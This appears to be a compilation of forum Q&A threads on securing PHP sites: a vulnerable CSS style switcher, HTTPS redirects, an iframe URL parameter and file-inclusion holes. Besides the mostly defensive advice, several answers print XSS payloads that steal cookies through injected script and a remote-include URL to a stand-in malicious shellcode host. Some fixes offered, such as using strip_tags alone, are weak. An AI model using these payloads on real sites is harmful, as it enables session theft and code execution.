I want to use a CSS style switcher on a live server. I've been asking on IRC and a guy said there is a big XSS hole. I don't know too much about XSS vulnerabilities. I hope someone can help me out to secure it!
i used this tutorial for the css switcher:
http://net.tutsplus.com/tutorials/javascript-ajax/jquery-style-switcher/
and the guy said the vulnerability is on the PHP side of the script!
Any tips would be highly appreciated!
Also, if someone could remake the whole script in a more secure way, please do; many people from net.tutsplus.com who use it would thank you!
The problem I see with this script is that a value that comes from the client, $_COOKIE['style'], is directly output into the page:
<link id="stylesheet" type="text/css" href="css/<?php echo $style ?>.css" rel="stylesheet" />
The cookie value can be hijacked by an external website under certain conditions. That cookie value is also set in style-switcher.php, based on a GET parameter, without any filtering.
What I recommend is limiting the value to a list of styles you want to be available.
Example :
<?php
if (!empty($_COOKIE['style'])) {
    $style = $_COOKIE['style'];
} else {
    $style = 'day';
}

// List of possible themes
$listStyle = array('day', 'night', 'foobar');
if (!in_array($style, $listStyle)) {
    $style = $listStyle[0];
}
?>
href="css/<?php echo $style ?>.css"
Every time you output a text string to HTML, you must use htmlspecialchars() on the value, otherwise out-of-band characters like <, & or in this case " will break out of the context (attribute value) and allow an attacker to insert arbitrary HTML into the page, including JavaScript content.
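As a minimal sketch of that rule applied to the tutorial's <link> tag (variable names as in the tutorial):

```php
<?php
// Fall back to a default style when no cookie is set.
$style = isset($_COOKIE['style']) ? $_COOKIE['style'] : 'day';
?>
<link id="stylesheet" type="text/css"
      href="css/<?php echo htmlspecialchars($style, ENT_QUOTES, 'UTF-8'); ?>.css"
      rel="stylesheet" />
```

ENT_QUOTES escapes both single and double quotes, so the value can no longer close the href attribute; combining this with the whitelist above is still the stronger fix.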
This is an HTML-injection hole, and you should fix it. However it is not yet directly an XSS vulnerability, because the source of $style is $_COOKIE. That cookie must have been set by your scripts, or by the user himself; unlike $_GET and $_POST values, it cannot be set on a user's browser by a third party. It only becomes a vulnerability if you allow a third party to cause the user's cookies to be set to arbitrary values.
However, style-switcher.php does exactly that:
$style = $_GET['style'];
setcookie("style", $style, time()+604800);
with no checking to see that $style is an approved value, and no checking that the request to switch styles has been made by the user himself and not an arbitrary link on a third-party site: that is, it is vulnerable to XSRF. Say an attacker included a link or img src in a page visited by the user, pointing to:
http://www.example.com/style-switcher.php?style="><script>steal(document.cookie);</script>
that script will now be run each time the user loads a page from your site. (Technically, the ", ; and </> characters in this example need to be URL-encoded with %, but I've left it raw here for readability.)
(Also, you should really be using a POST form for this, since it has a side-effect action.)
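A common XSRF mitigation (a sketch, not the tutorial's code; random_bytes() assumes PHP 7, and hash_equals() PHP 5.6) is to tie state-changing requests to a per-session token:

```php
<?php
session_start();

// Generate a token once per session (on older PHP,
// openssl_random_pseudo_bytes() can stand in for random_bytes()).
if (empty($_SESSION['token'])) {
    $_SESSION['token'] = bin2hex(random_bytes(16));
}

// In the style-switch handler: reject any request without the token.
if (!isset($_GET['token']) || !hash_equals($_SESSION['token'], (string) $_GET['token'])) {
    die('Invalid request');
}
```

Links to the switcher would then include the current session's token, so a third-party page cannot forge a valid request.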
What's worse, the same script contains a direct echoed injection which most definitely is XSS-vulnerable:
if(isset($_GET['js'])) {
echo $style;
}
This hole allows arbitrary content injection. Although normally you will be expecting this script with js to be called by an XMLHttpRequest (via jQuery get()), there is nothing stopping an attacker calling it by linking a user to a URL like:
http://www.example.com/style-switcher.php?style=<script>steal(document.cookie);</script>&js=on
and in response they'll get their <script> echoed back in a page that, with no Content-Type header explicitly set, will default to text/html, causing JavaScript of the attacker's choosing to be executed in your site's security context.
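A hardened sketch of style-switcher.php (same file and parameter names as the tutorial, but a hypothetical rewrite) would whitelist the value and set an explicit, non-HTML content type before echoing anything:

```php
<?php
// Hypothetical rewrite, not the tutorial's original code.
$listStyle = array('day', 'night');
$style = isset($_GET['style']) ? $_GET['style'] : 'day';

// Reject anything not on the approved list.
if (!in_array($style, $listStyle, true)) {
    $style = 'day';
}
setcookie('style', $style, time() + 604800);

if (isset($_GET['js'])) {
    // Explicit content type: the response can never be parsed as HTML.
    header('Content-Type: text/plain; charset=utf-8');
    echo $style;  // safe: whitelisted above
}
```

Note that this still lacks XSRF protection, so the non-JS path remains a liability as discussed above.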
header("Location: ".$_SERVER['HTTP_REFERER']);
This is not a good idea for other reasons. The Referer header is not guaranteed to make its way to your server. To ensure this works, pass the URL-to-return-to in a parameter to the script.
I probably wouldn't bother with the PHP side to this. I'd just set the relevant cookie from JavaScript and location.reload() or manipulate the stylesheet DOM to update. The PHP script is an attempt to make the switcher work without JavaScript, but unless you can be bothered to implement it properly and securely with XSRF protection, it is a liability.
If you include your alternative style sheets as <link rel="alternate stylesheet"> you'll be giving stylesheet switching support to users without JavaScript anyway.
Subject your app to a comprehensive security test to see where the holes are. Try Skipfish.
I want to detect whether or not a user is viewing a secure page and redirect if not (for logging in).
However, my site travels through a proxy before I see the server variables and the proxy (right now) is telling me that $_SERVER['HTTPS'] is 'on' when the URI clearly indicates otherwise. It also shows 'on' when the user is navigating 'securely'.
Navigating through http:// and https:// both output that $_SERVER['SERVER_PORT'] = 443.
I don't have the ability to make any changes to the proxy so I want to know:
Does PHP have any other options for me to detect the truth or...
Am I stuck resorting to JavaScript's mechanisms for detection and redirection?
I mined this question for ideas but they mostly revolve around the $_SERVER['HTTPS'] variable being trustworthy. Bah!
It appears that this question is experiencing at least something similar, but s/he was able to resolve it by adapting an Apache solution.
Are there any other PHP SERVER variables or tricks available to detect what the user's URI begins with? The only difference between the $_SERVER variables when my site is viewed http versus https are the following:
_FCGI_X_PIPE_ (appears random)
HTTP_COOKIE (sto-id-47873 is included in the non-secure version but I did not put it there)
REMOTE_ADDR (This and the next two keep changing inexplicably!)
REMOTE_HOST
REMOTE_PORT ('proxy people', why are you continually changing this?)
Are any of these items strong enough to put one's weight upon without it splintering and causing pain later? Perhaps I shouldn't trust anything as filtered through the proxy since it could change at any given time.
Here is my plan to use JavaScript for this purpose; is it the best I have?
function confirmSSL() {
    if (location.protocol != "https:") {
        var locale = location.href;
        locale = locale.replace(/http:\/\//, "https://");
        location.replace(locale);
    }
}
<body onLoad="confirmSSL()">...
I think if the user has JavaScript disabled in my community, then they hopefully know what they are doing. They should be able to manually get themselves into a secure zone. What sort of <noscript> suggestions would be commonplace / good practice? Something like this, perhaps?:
<noscript>Navigate using https://blah.more.egg/fake to protect your information.</noscript>
PHP solutions that work (with good explanation) will be given preference for the correct answer. Feel free to submit a better JavaScript implementation or link to one.
Many thanks!
Although already partially discussed in the question's comments, I'll summarize some suggestions concerning the redirection logic in JavaScript:
Generally, using window.location instead of location is advisable; an explanation can be found here.
A regex seems like a bit of overkill for a simple replacement of the protocol.
The redirection logic should be executed as soon as possible, because in the event of redirection, every additional document processing is unnecessary.
Browsers with JavaScript disabled should at least show a notification prompting the user to switch to https.
I suggest using the following code (adopted from here), which is short and efficient:
<head>
<script type="text/javascript">
if (window.location.protocol != "https:") {
window.location.href = "https:" + window.location.href.substring(window.location.protocol.length);
}
</script>
...
</head>
<body>
...
<noscript>Please click here to use a secure connection!</noscript>
...
Just use the client-side approach. If your proxy is non-configurable, then that option is out. Detecting and redirecting via js is fine.
There is also a way to achieve the redirection without client-side JavaScript. This method can be especially helpful if JavaScript is disabled in the client's browser.
The steps are pure PHP and pretty simple:
Start a session
If it's a fresh session, redirect to the https location
If the session isn't new, it can be assumed, that the user has been redirected
Example code:
<?php
session_start();
if( !isset($_SESSION['runningOnHttps']) ) {
$_SESSION['runningOnHttps'] = true;
header('Location: https://my-cool-secure-site.com');
}
?>
Naturally, you could restrain this functionality to those browsers with JavaScript disabled in order to create a kind of 'hybrid mode': Whenever there is a new session with a non-JS browser, make a request to some kind of callback script that notifies the server to send a location header:
some_landingpage.php sends an initial <noscript> containing a hidden iframe, which will load redirect.php:
if( !isset($_SESSION['checkWasMade']) ) {
$_SESSION['checkWasMade'] = true;
echo '<noscript>
<iframe src="redirect.php" style="visibility: hidden; position: absolute; left: -9000px;"></iframe>
</noscript>';
}
A request to redirect.php will let you know, that JavaScript is disabled and give you the chance to force redirection by sending a Location header (see above) with the next actual request.
As a matter of course, this method will only work reliably, if the protocol won't change (magically?) during one session.
UPDATE:
All of the above-mentioned methods for handling non-JavaScript user agents could be rendered moot by an even neater approach:
I just learned, that <noscript> can also be included inside the <head>, which allows one to just redirect via <meta> tags.
Hence, some_landingpage.php could send an initial meta-refresh inside <noscript>:
// The following echo must appear inside the html head
if( !isset($_SESSION['checkWasMade']) ) {
$_SESSION['checkWasMade'] = true;
echo '<noscript>
<meta HTTP-EQUIV="REFRESH" content="0; url=https://my-cool-secure-site.com">
</noscript>';
}
I am creating a very basic iPhone simulator, and what I want to do is host it in one location; then, for any of our sites we want to show in it, we would just call it using: http://www.example.com/iphone-test.php?url=http://www.example.com/mobile/
Is there anything I need to look out for that could be unsafe? There is no database involved or anything, but just in case someone wanted to mess around and put some stuff in the URL, what are some things I can do to help make this a little safer?
Here is my code:
<?php
if(isset($_GET['url'])) {
$url = $_GET['url'];
?>
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>iPhone Test</title>
<style type="text/css">
#iphone {
background:url(iPhone.png) no-repeat;
width:368px; height:706px;
position:relative;
overflow:hidden;
}
#iphone iframe {
position:absolute;
left:30px;
top:143px;
border:0;overflow:hidden;
}
</style>
</head>
<body>
<div id="iphone">
<iframe src="<?=$url;?>" width="307" height="443"><p>Your Browser does not support iFrames.</p></iframe>
</div>
</body>
</html>
<?php
}
?>
Edit: Thanks for all of your help. I did some research and here is what I have so far:
<?php
include_once 'filter.php';
$filter = new InputFilter();
if(isset($_GET['url'])) {
if (filter_var($_GET['url'], FILTER_VALIDATE_URL)) {
$url = $filter->process($_GET['url']);
?>
Source: http://oozman.com/php-tutorials/avoid-cross-site-scripting-attacks-in-php/
Class: http://www.phpclasses.org/browse/file/8941.html
What do you think?
You should use PHP's filter_var to check it's valid...
if (isset($_GET['url'])) {
if (filter_var($_GET['url'], FILTER_VALIDATE_URL)) {
$url = $_GET['url'];
}
}
If this page is accessible for anyone to access then you are opening yourself up to XSS and Phishing redirects. For example, try adding this to your URL params:
?url="></iframe><script>alert(123)</script>
In Firefox 6.02 that fires off the alert. Which means that any JS could be fired and used to redirect users who think they are visiting your site. Or it could be used to steal cookies that are not marked HTTPOnly.
This can be mitigated by encoding for HTML attributes. Which is described here from OWASP:
Except for alphanumeric characters, escape all characters with ASCII values less than 256 with the &#xHH; format (or a named entity if available) to prevent switching out of the attribute. The reason this rule is so broad is that developers frequently leave attributes unquoted. Properly quoted attributes can only be escaped with the corresponding quote. Unquoted attributes can be broken out of with many characters, including [space] % * + , - / ; < = > ^ and |.
Reference: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#RULE_.232_-_Attribute_Escape_Before_Inserting_Untrusted_Data_into_HTML_Common_Attributes
Now, for your other issue, which the above will not address: if you allow just any arbitrary URL to be entered, then there is nothing stopping someone from doing something like this:
?url=http://myevilsite.com/redirect.php
And have that page redirect the user:
window.top.location.href = "http://www.site.com";
The only thing you can do about that is to use a white list of acceptable URLs.
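A sketch of such a whitelist check (host names hypothetical):

```php
<?php
// Only frame URLs whose host is on an approved list.
$allowedHosts = array('www.example.com', 'm.example.com');  // hypothetical

$url  = isset($_GET['url']) ? $_GET['url'] : '';
$host = parse_url($url, PHP_URL_HOST);

if (!is_string($host) || !in_array(strtolower($host), $allowedHosts, true)) {
    die('URL not allowed');
}

// Still escape for the attribute context, per the OWASP rule above.
$src = htmlspecialchars($url, ENT_QUOTES, 'UTF-8');
```

This closes the open-redirect/phishing hole: only pages you control can be loaded into the frame.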
The request method does not provide any security features; please see this answer.
You need to be 100% sure beyond doubt that your code will not hijack that frame with javascript or lead the person to a malicious domain, or lead to a request form on your page that does something they don't want.
You can see some examples out here of that:
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<iframe src=http://ha.ckers.org/scriptlet.html"></IFRAME>
You could have the person led to post something as well...
Anyway, I can steal all your cookies, or trick the user into thinking they're still on your site but really be on mine where I get all their precious information.
Just stop. Before you go any further, you need to know what you're doing, and you can start by reading this.
You are vulnerable to cross site scripting.
All someone has to do is include "></iframe><script>EEEEVVvvvillll!!!! in the URL, or use a non-HTTP/HTTPS URI.
Here is a list of the security concerns involved:
IFrames security summary
Wednesday, 24 October 2007
I've decided to collect the various proofs of concept I've done and summarise why iframes are a security risk.
Here are the top reasons:-
Browser cross domain exploits
Description:- Because you can embed another web site inside your page,
you can exploit that page and perform actions as that user and doing
anything on a chosen web site.
Proof of concept:- Safari beta 3.03 zero day
XSS/CSRF reflection attacks
Description:- Using iframes embedded onto a compromised site an
attacker then can reflect attacks to other servers therefore making
attacks difficult to trace and having a focal point to conduct
attacks.
Proof of concept:- None available for this type of attack as it would
be difficult to show the method without actually conducting an attack.
CSS and iframes can scan your LAN from the internet!
Description:- By exploiting features in CSS and using iframes to check
if the default IP address exists, it’s possible to get your network
address range quite easily providing the network device uses the
default out of the box IP address.
Proof of concept:- CSS LAN scanner
LAN scanning with Javascript and iframes
Description:- Using a similar method as above it is possible to gain
your LAN information using Javascript.
Proof of concept:- Javascript LAN scanner
CSS iframe overlays
Description:- Iframes can be embedded inside each other in Firefox and
you can alter their appearance to create seamless overlays with any
site. This would make it very difficult for a user to know which site
they are interacting with and fool them to performing an action.
Proof of concept:- Verisign OpenID exploit (now fixed)
URL redirection
Description:- Iframes also allow you to perform redirection so you can
have access to URLs which normally wouldn’t be accessible. In the
delicious example, the POC redirects from delicious/home to your
account bookmarks and then uses CSS overlays to display your first
bookmark. Firefox and a delicious account are required for the POC.
Proof of concept:- Delicious CSS overlay/Redirection
Original here
You could make it a lot safer by acting like a proxy: load the requested URL in PHP, strip everything unsafe out of the HTML (JavaScript etc.), and then point the iframe at a page on your own server that serves the cleaned result.
Simply use strip_tags() to avoid any evil script entry:
$url = strip_tags($_GET['url']);
I have a situation like this.
<php>
<redirect the page >
<exit>
<javascript>
<redirect the page again>
I want to have javascript that basicall disables the PHP redirect. So if Javascript is enabled on the browser, the javascript redirect will work, if it disable, the PHP redirect will work. Should I just enclose the PHP code in span and make it invisible? Any ideas?
Addition: OK, this is not a simple redirect. The form authentication is rather odd: register.php -> register_submit.php -> was there an error? -> yes, go back to register.php (everything is JavaScript at this point). What I have added is PHP authentication as well, so if I see JavaScript is not enabled, I take the user to register.php *after it does the regular checking of fields*.
PHP is a server-side technology. By the time Javascript even sees what's happened, it's too late.
Short answer, JS can't intercept/block PHP (as long as PHP is being called first).
Order of events:
Client requests page
PHP executes and generates output of page
Browser receives output
Browser begins parsing the output PHP already produced.
Remove your PHP redirection and add this in your <head>:
<noscript>
<meta http-equiv="refresh" content="0; url=http://www.example.com/1" />
</noscript>
<script>
window.location = 'http://www.example.com/2';
</script>
This will redirect to http://www.example.com/1 when javascript is disabled, and to http://www.example.com/2 when it's enabled.
PHP code is executed on the server-side, while JS is client-side. So with that structure the PHP will kick in before the JS is executed. If you want JS to control PHP you need to make use of AJAX to control it.
Also enclosing PHP code in a "span" won't have any effect.
Javascript and PHP do not directly interact (exceptions apply, don't worry about them now :D). The best way to implement this type of interaction between these two disparate languages is to use the query string or cookies.
I think there may be some confusion here about when and how PHP is executed as opposed to when and how javascript is executed. Think of PHP as the factory - the goods are physically produced there. Think of your server as the loading dock, the internet as the shipping company. Your browser is the store, HTML is the shelves; Javascript is the window decorations on the store that sells the merchandise. The window decorations have no effect on the production; the factory can make some window decorations, but it doesn't use them, it just ships them right along with the merchandise for the store to use. PHP is the factory, javascript is the decoration. There are some problems with taking this analogy too literally, but there it is in a nutshell.
You can make the PHP redirect conditional on the presence or absence of a specific query string variable:
<?php
// redirect if $_GET['no_redirect'] is NOT set. Reverse the condition to invert this rule
$do_redirect = (isset($_GET['no_redirect']) === false);

// perform the redirect, if required
if ($do_redirect === true)
    header('Location: http://mydomain.com');
?>
Javascript:
window.location = 'http://mydomain.com/?no_redirect=1';
EDIT: If you're trying to detect whether JavaScript is enabled, then the best way is for JavaScript to set a cookie if it is enabled. PHP can then check for this cookie; if it isn't found, you'll know that JavaScript didn't get a chance to set it, so it must be disabled (or the user edited their cookies).
Take a look at some code snippets for dealing with cookies in javascript, and check out the documentation for dealing with cookies in PHP.
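A minimal sketch of that cookie handshake (cookie name hypothetical): PHP checks for the cookie and, when it is absent, emits a one-line script that sets it for subsequent requests:

```php
<?php
// Did JavaScript set the marker cookie on an earlier page load?
$jsEnabled = isset($_COOKIE['js_enabled']);

if (!$jsEnabled) {
    // If JavaScript runs, the next request will carry the cookie;
    // if it never appears, assume JavaScript is disabled.
    echo '<script>document.cookie = "js_enabled=1; path=/";</script>';
}
```

Note that the very first page view always looks like "no JavaScript", so only act on the result from the second request onward.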
I want to allow users of my site to post URLs. These URLs would then be rendered on the site in the href attributes of <a> tags. Basically, user A posts a URL, my site displays it on the page as an <a> tag, then user B clicks it to see pictures of kittens.
I want to prevent javascript execution and xss attacks, and ensure there are no malformed urls in the output I generate.
Example: User A posts a malformed URL, supposedly to pictures of kittens. My site tries to generate an <a> tag from user A's data, then user B clicks the resulting link. User A has actually posted a malformed URL which adds a JavaScript "onclick" event in the tag to send the victim's cookies to another site.
So I want to only allow correctly formed urls, and block out anything other than http/https protocols. Since I'm not allowing anything here which doesn't look like a url, and the user is not providing me html, it should be pretty simple to check by parsing and reforming the url.
My thinking is that parse_url should fail with an error on malformed urls, or it replaces illegal characters with '_'. I can check the separated parts of the url for allowed protocols as well. Then by constructing a url using http_build_url, I take the parts separated by parse_url and put them back together into a url which is known to be correctly formed. So by breaking them down this way first, I can give the user an error message when it fails instead of putting a sanitized broken url in my page.
The question is, will this prevent xss attacks from doing evil if a user clicks the link? Does the parsed and rebuilt url need further escaping? Is there a better way to do this? Shouldn't this be a solved problem by now with functions in the standard php libraries?
I really don't want to write a parser myself and I'm not going to even consider regular expressions.
Thanks!
What you need to do is just escape content properly when building your HTML. This means that when a value has a " in it, you build your HTML with &quot; instead.
Protecting against XSS isn't primarily about validating URLs; it's about proper escaping (although you probably do want to be sure that it's an http: or https: link).
For a more detailed list of what to escape when building html strings (ie: the href attribute) see HTML, URL and Javascript Escaping
No, parse_url is not meant to be a URL validator.
You can use filter_var for this:
filter_var($someURL, FILTER_VALIDATE_URL);
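Combined with a scheme whitelist (to block javascript: and data: URLs) and attribute escaping, a sketch might look like:

```php
<?php
function safe_url($url) {
    // Must be a syntactically valid URL at all.
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return false;
    }
    // Only allow http and https.
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if (!in_array($scheme, array('http', 'https'), true)) {
        return false;
    }
    return $url;
}

$url = safe_url($_GET['url']);
if ($url !== false) {
    // Escape for the attribute context when building the tag.
    echo '<a href="' . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . '">link</a>';
}
```

The validation rejects malformed input with a clear error, and the escaping guarantees the value cannot break out of the href attribute.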
So, in PHP, you would use something like:
<?php
$userlink = "http://google.com";
$newlink = htmlentities($userlink);
$link = "$newlink";
?>
Depending on a few other things, you might just validate the URL by checking if it points to any content. Here is an example:
<?php
// URL to test
// $url = "";
$content = file_get_contents($url);
if(!empty($content)){
echo "Success:<br /><iframe src=\"$url\" style=\"height:400px; width:400px; margin:0px auto;\"></iframe>";
}else{
echo "Failed: Nothing exists at this url.";
}
?>
cURL is another option. With cURL you can return just the HTTP headers and then check the status code it returns, i.e. 404 = Not Found, 200 = OK, 201 = Created, 202 = Accepted, etc.
Good luck!
My website was recently attacked by, what seemed to me as, an innocent code:
<?php
if (isset($_GET['page'])) {
    include($_GET['page'] . ".php");
} else {
    include("home.php");
}
?>
There where no SQL calls, so I wasn't afraid for SQL Injection. But, apparently, SQL isn't the only kind of injection.
This website has an explanation and a few examples of avoiding code injection: http://www.theserverpages.com/articles/webmasters/php/security/Code_Injection_Vulnerabilities_Explained.html
How would you protect this code from code injection?
Use a whitelist and make sure the page is in the whitelist:
$whitelist = array('home', 'page');
if (in_array($_GET['page'], $whitelist)) {
    include($_GET['page'] . '.php');
} else {
    include('home.php');
}
Another way to sanitize the input is to make sure that only allowed characters (no "/", ".", ":", ...) are in it. However don't use a blacklist for bad characters, but a whitelist for allowed characters:
$page = preg_replace('/[^a-zA-Z0-9]/', '', $page);
... followed by a file_exists.
That way you can make sure that only scripts you want to be executed are executed (for example this would rule out a "blabla.inc.php", because "." is not allowed).
Note: This is kind of a "hack", because then the user could request "h.o.m.e" and it would give the "home" page, since all it does is remove all prohibited characters. It's not intended to stop "smartasses" who want to do cute stuff with your page, but it will stop people doing really bad things.
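Putting the two steps together (character whitelist, then existence check) might look like this sketch:

```php
<?php
$page = isset($_GET['page']) ? $_GET['page'] : 'home';

// Whitelist of allowed characters: strip everything else,
// which also removes "." and "/" (no traversal, no ".inc.php").
$page = preg_replace('/[^a-zA-Z0-9]/', '', $page);

// Fall back to home if the resulting file does not exist here.
if ($page === '' || !file_exists(dirname(__FILE__) . "/{$page}.php")) {
    $page = 'home';
}
include(dirname(__FILE__) . "/{$page}.php");
```

Anchoring the path with dirname(__FILE__) ensures only scripts in this directory can ever be included.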
BTW: Another thing you could do in your .htaccess file is to prevent obvious attack attempts:
RewriteEngine on
RewriteCond %{QUERY_STRING} http[:%] [NC]
RewriteRule .* /-http- [F,NC]
RewriteRule http: /-http- [F,NC]
That way, all page accesses with an "http:" URL (in the query string) result in a "Forbidden" error message, without even reaching the PHP script. That results in less server load.
However, keep in mind that no "http" is then allowed anywhere in the query string. Your website MIGHT require it in some cases (maybe when filling out a form).
BTW: If you can read German, I also have a blog post on that topic.
The #1 rule when accepting user input is to always sanitize it. Here, you're not sanitizing your page GET variable before passing it into include. You should perform a basic check to see if the file exists on your server before you include it.
Pek, there are many things to worry about in addition to SQL injection, and even different types of code injection. Now might be a good time to look a little further into web application security in general.
From a previous question on moving from desktop to web development, I wrote:
The OWASP Guide to Building Secure Web Applications and Web Services should be compulsory reading for any web developer that wishes to take security seriously (which should be all web developers). There are many principles to follow that help with the mindset required when thinking about security.
If reading a big fat document is not for you, then have a look at the video of the seminar Mike Andrews gave at Google a couple years back about How To Break Web Software.
I'm assuming you deal with files in the same directory:
<?php
if (isset($_GET['page']) && !empty($_GET['page'])) {
$page = urldecode($_GET['page']);
$page = basename($page);
$file = dirname(__FILE__) . "/{$page}.php";
if (!file_exists($file)) {
$file = dirname(__FILE__) . '/home.php';
}
} else {
$file = dirname(__FILE__) . '/home.php';
}
include $file;
?>
This is not too pretty, but should fix your issue.
pek, for a short term fix apply one of the solutions suggested by other users. For a mid to long term plan you should consider migrating to one of existing web frameworks. They handle all low-level stuff like routing and files inclusion in reliable, secure way, so you can focus on core functionalities.
Do not reinvent the wheel. Use a framework. Any of them is better than none. The initial time investment in learning it pays back almost instantly.
Some good answers so far, also worth pointing out a couple of PHP specifics:
The file open functions use wrappers to support different protocols. This includes the ability to open files over a local Windows network, HTTP and FTP, amongst others. Thus in a default configuration, the code in the original question can easily be used to open any arbitrary file on the internet and beyond, including, of course, all files on the server's local disks (that the web server user may read). /etc/passwd is always a fun one.
Safe mode and open_basedir can be used to restrict files outside of a specific directory from being accessed.
Also useful is the config setting allow_url_fopen, which can disable URL access in the file open functions. Note that in modern PHP this setting is PHP_INI_SYSTEM, so it must be set in php.ini or the server configuration; it cannot be changed with ini_set() at runtime.
These are all nice fall-back safety guards, but please use a whitelist for file inclusion.
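The corresponding php.ini settings might look like this (a sketch; the path is hypothetical, and allow_url_include exists since PHP 5.2):

```ini
; Restrict what the file functions and include/require can reach
allow_url_fopen = Off            ; no http:// or ftp:// in file functions
allow_url_include = Off          ; no remote files in include/require
open_basedir = /var/www/site/    ; confine file access to this directory
```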
I know this is a very old post and I expect you don't need an answer anymore, but IMHO a very important aspect is still missing, and I'd like to share it for other people reading this post. In your code, including a file based on the value of a variable makes a direct link between the value of a field and the requested result (page becomes page.php). I think it is better to avoid that.
There is a difference between the request for some page and the delivery of that page. If you make this distinction you can make use of nice URLs, which are very user- and SEO-friendly. Instead of a field value like 'page' you could make a URL like 'Spinoza-Ethica'. That is a key in a whitelist or a primary key in a database table and will return a hardcoded filename or value. That method has several advantages besides a normal whitelist:
the back end response is effectively independent from the front end request. If you want to set up your back end system differently, you do not have to change anything on the front end.
Always make sure you end up with hardcoded filenames or an equivalent from the database (preferably a return value from a stored procedure), because it is asking for trouble when you use information from the request to build the response.
Because your URLs are independent of the delivery from the back end you will never have to rewrite your URLs in the htAccess file for this kind of change.
The URLs represented to the user are user friendly, informing the user about the content of the document.
Nice URLs are very good for SEO, because search engines look for relevant content, and when your URL is in line with the content it will get a better rating; at least a better rating than when your URL is definitely not in line with your content.
If you do not link directly to a php file, you can translate the nice URL into any other type of request before processing it. That gives the programmer much more flexibility.
You will have to sanitize the request, because you get the information from a standard untrusted source (the rest of the Web). Using only nice URLs as possible input makes the sanitization process much simpler, because you can check whether the returned URL conforms to your own format. Make sure the format of the nice URL does not contain characters that are used extensively in exploits (like ', ", <, >, -, &, ; etc.).
#pek - That won't work, as your array keys are 0 and 1, not 'home' and 'page'.
This code should do the trick, I believe:
<?php
$whitelist = array(
'home',
'page',
);
if(in_array($_GET['page'], $whitelist)) {
include($_GET['page'] . '.php');
} else {
include('home.php');
}
?>
As you've a whitelist, there shouldn't be a need for file_exists() either.
Think of a URL in this format:
www.yourwebsite.com/index.php?page=http://malicodes.com/shellcode.txt
If shellcode.txt runs SQL or PHP injection, then your website will be at risk. With this in mind, using a whitelist would help.
There is a way to filter all variables to help avoid hacking: you can use PHPIDS or OSE Security Suite. After installing the security suite, you need to activate it; here is the guide:
http://www.opensource-excellence.com/shop/ose-security-suite/item/414.html
I would suggest you turn on layer 2 protection; then all POST and GET variables will be filtered, especially the ones I mentioned, and if attacks are found, it will report to you immediately.
Safety is always the priority